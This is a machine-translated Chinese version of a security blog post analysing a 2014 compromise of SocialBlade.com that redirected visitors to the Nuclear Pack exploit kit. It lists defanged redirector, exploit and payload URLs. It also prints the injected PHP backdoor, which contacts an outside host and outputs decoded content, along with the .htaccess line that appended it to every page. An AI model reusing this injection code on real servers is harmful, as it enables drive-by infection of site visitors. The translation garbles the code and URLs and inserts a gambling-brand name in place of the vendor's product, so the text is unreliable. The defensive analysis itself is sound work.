更新(07/29/2014):根据我们的通知,SocialBlade.com的开发人员已经调查并确定了泄露的来源。该网站已经清除了恶意软件,到目前为止,我们的系统还没有检测到任何可疑活动的痕迹。我们将在未来几天监控该网站,并在需要时进行更新。

更新2 (07/29/2014)SocialBlade的开发人员很好心地向我们提供了这次攻击的技术服务器细节。我们在这里也分享这些,以努力帮助许多其他受影响的网站所有者快速识别和解决这种类型的妥协。跳转到服务器端部分

- - - - - -

上周,我们写了AskMen.com网站上的漏洞导致毫无防备的访问者访问了“核包”漏洞工具包,并感染了易受攻击的计算机。

在一个类似的活动中,YouTube统计跟踪网站SocialBlade.com与恶意重定向有关,也会导致核包EK。

“Social Blade是一个数据驱动的网站,在这里你可以跟踪你在Youtube上的进展,并与其他大的Youtube用户进行比较,看看你做得如何。”

socialblade2

我们的蜜罐检测到的驱动下载被Malwarebytes成功阻止必威平台APPAnti-Exploit

根据网站跟踪器让用户社交网站SocialBlade.com的全球排名为5791,上个月的访问量约为360万次。

让用户

技术细节

交通流

hxxp://socialblade.com/youtube/user/Goleyjoygame hxxp://socialblade.com/js/jquery.js hxxp://static.the-button.com/d2.php?ds=true&dr=1447532217 hxxp://static.pointweb.ca/pop2.php?acc = sbc b0%fa % DD % % 0 e % 97% 92% 05% caf % 8 F8 % 8 e % % D1rd + % % DD % % 89% DD AE&nrk = 6160647100 hxxp: / / e3dd7df0d05y.correctzoom.uni。Me / hxxp://50d88d1ad05y.correctzoom.uni. Me /1406197380.swf hxxp://50d88d1ad05y.correctzoom.uni。Me /f/1406197380/7 hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.pdf hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.htm hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/5/ x0052080409090407000700080150050f0304045106565601

网站上妥协

准确定位感染开始的位置比通常情况下要复杂一些。通常我们会看到一个iframe,我们可以通过它的字符串来搜索它。这里不是这样,所以我们必须手动检查每个web会话和外部引用。

入侵者位于核心JavaScript文件中:hxxp://socialblade.com/js/jquery.js

注射

通常情况下,流氓代码被附加到现有插件的末尾,但并不总是容易发现,或者不应该总是标记为糟糕的。要找的是原版(未改动的)版本jquery.js把两者进行比较。很明显,有额外的代码被注入,很可能是通过驻留在web服务器本身的后门。

更新:服务器端详细信息

Apache服务器日志

- 2014-07-28 18:27:18 - http://sux.pw/p/?type=raw&id=9dc0840c
解决sux。pw (sux.pw)…

跨站点污染

罪魁祸首:settings2.php

<?php if (!isset($_SESSION)) session_start();if (!isset($_SESSION["pcid"])) {$imptt_agent = getenv('HTTP_USER_AGENT');if(stristr($imptt_agent, 'Windows NT')&&(stristr($imptt_agent, 'MSIE')||stristr($imptt_agent, 'Trident')) {$imptt_ip = ip2long($_SERVER['REMOTE_ADDR']);If ($imptt_ip<0) $imptt_ip += 4294967296;$imptt_fp = fsockopen(" static.thebutton.com ", 80);如果(imptt_fp美元){fputs (imptt_fp美元,"博士/ d2.php ? = " .rand(100000000, 9999999999),”di = "。imptt_ip美元。“du = " .urlencode (imptt_agent美元)。”HTTP / 1.0 \ n \ n”);而(! feof (imptt_fp美元))$ imptt_pt = fgets (imptt_fp 4096美元);print (base64_decode (imptt_pt美元)); fclose($imptt_fp); $_SESSION['pcid'] = $imptt_ip; } } } ?>

受感染的. htaccess文件

原因:. htaccess(有777个烫发)正在加载的内容settings2.php(恶意代码)到每个文件时,网站被渲染。

auto_append_file "/var/www/blog/wp-admin/network/settings2.php"

注意:实际的目录路径已经“匿名化”,以不暴露SocialBlade的基础设施。

JavaScript代码分析

现在让我们回到面向访问者的JavaScript代码服务器。以下变量(年代)由unicode组成。这种技术通常用来隐藏明显的字符串,不让人看到。var_s

我们可以把它翻译成文字,看看它隐藏了什么:

unicode

这为我们提供了URL (静态的。the-button.com/ d2.php ?)它被用作iframe。这看起来像一个妥协的网站(对电视剧的粉丝来说太糟糕了失去了-到那里去,风险自负!)

失去了

其余的JavaScript代码编写iframe并启动重定向工作流。为了了解它的进展情况,我们将使用谷歌Chrome的JavaScript控制台。

因为代码只在用户正在运行Internet Explorer或Firefox时触发,所以我们可以注释掉该条件,以便它始终执行,即使在Chrome中也是如此。

来源

Network选项卡显示了加载JavaScript时发生的情况。我们可以看到第一个请求d2.php,其后是pop2.php.值得注意的是,这个重定向在每个IP地址只发生一次。

网络

重定向器# 1
hxxp: / / static.the-button.com/d2.php ? ds = true&dr = 1447532217

推荐人

源代码:

d2

这将创建到第二个重定向器的iframe。

转向器# 2:
hxxp: / / static.pointweb.ca / pop2.php吗?acc = sbc b0%fa % DD % % 0 e % 97% 92% 05% caf % 8 F8 % 8 e % % D1rd + % % DD % % 89% DD AE&nrk = 6160647100

pop2

现在我们有了最终的重定向到利用套件登陆页面(注意代码混淆和使用rot13来屏蔽URL)。

核包EK登陆页面
hxxp: / / e3dd7df0d05y.correctzoom.uni.me /

着陆

Flash漏洞(cve - 2014 - 0515?)
hxxp: / / 50 d88d1ad05y.correctzoom.uni.me / 1406197380. swf
VT (5/53)链接

主权财富基金

PDF利用(CVE-2010-0188参见详细信息博客通过Quequero
hxxp: / / 50 d88d1ad05y.correctzoom.uni.me / 1406197380. pdf
VT (4/52)链接

pdf_properties

Java漏洞(cve - 2013 - 2465?)
hxxp: / / 50 d88d1ad05y.correctzoom.uni.me / 1406197380. jar
VT (4/52)链接

java

Internet Explorer漏洞(CVE ?)
htm hxxp: / / 50 d88d1ad05y.correctzoom.uni.me / 1406197380.
VT (0/53)链接

即

有效载荷
hxxp: / / 50 d88d1ad05y.correctzoom.uni.me / f / 1406197380/7
VT (17/52)链接

必威平台APP反恶意软件将其检测为Trojan.Agent.ED。

这个下载程序返回到:icepower.su / b /鞋/ 75412然后尝试从。下载文件smokejuse.su / mod_articles9874.564 / jquery /.这很可能导致与广告欺诈相关的恶意软件(点击劫持等)。

我们已经通知了SocialBlade.com的所有者,这样他们可以尽快解决这个问题,防止不必要的恶意软件感染。

一如既往,请确保您的计算机是最新的(特别是浏览器及其插件),并有实时防病毒/反恶意软件保护。要想比坏人领先一步,可以考虑使用主动检测和阻止恶意代码行为的反利用(Anti-Exploit)缓解工具。

@jeromesegura